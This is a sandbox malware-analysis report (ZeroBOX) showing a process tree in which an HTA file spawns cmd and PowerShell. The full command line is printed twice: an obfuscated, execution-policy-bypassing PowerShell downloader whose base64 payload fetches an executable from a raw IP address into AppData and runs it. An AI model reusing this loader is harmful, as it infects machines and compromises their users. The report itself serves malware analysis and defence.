| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\90.hta
2548
- cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
  2640
  - powershell.exe pOwERsHElL.exe -EX BYPAsS -NoP -w 1 -C DeViCeCReDENTiALdePLOYmeNT ; Iex($(iEx('[systeM.TeXt.ENCodIng]'+[ChAR]58+[CHaR]0x3a+'utF8.GeTStRiNg([sYSTeM.cONVeRT]'+[cHAr]0X3a+[cHAR]0X3a+'FrOmbaSe64sTRING('+[CHAr]34+'JFZMd2ptICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUkRFRmlOaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHV6UERRc2ZrSCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUZEWllOVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3V2dUlEcUphZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpsbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdW9ES2lxS0l3cUMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlFBZGhGdSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTHVrVndoQyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWTHdqbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvOTAvc2Fob3N0LmV4ZSIsIiRlbnY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1N0YXJULVNsZWVwKDMpO3N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHAR]34+'))')))"
    2732
    - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
      2852
      - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFB39.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFB28.tmp"
        2912

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents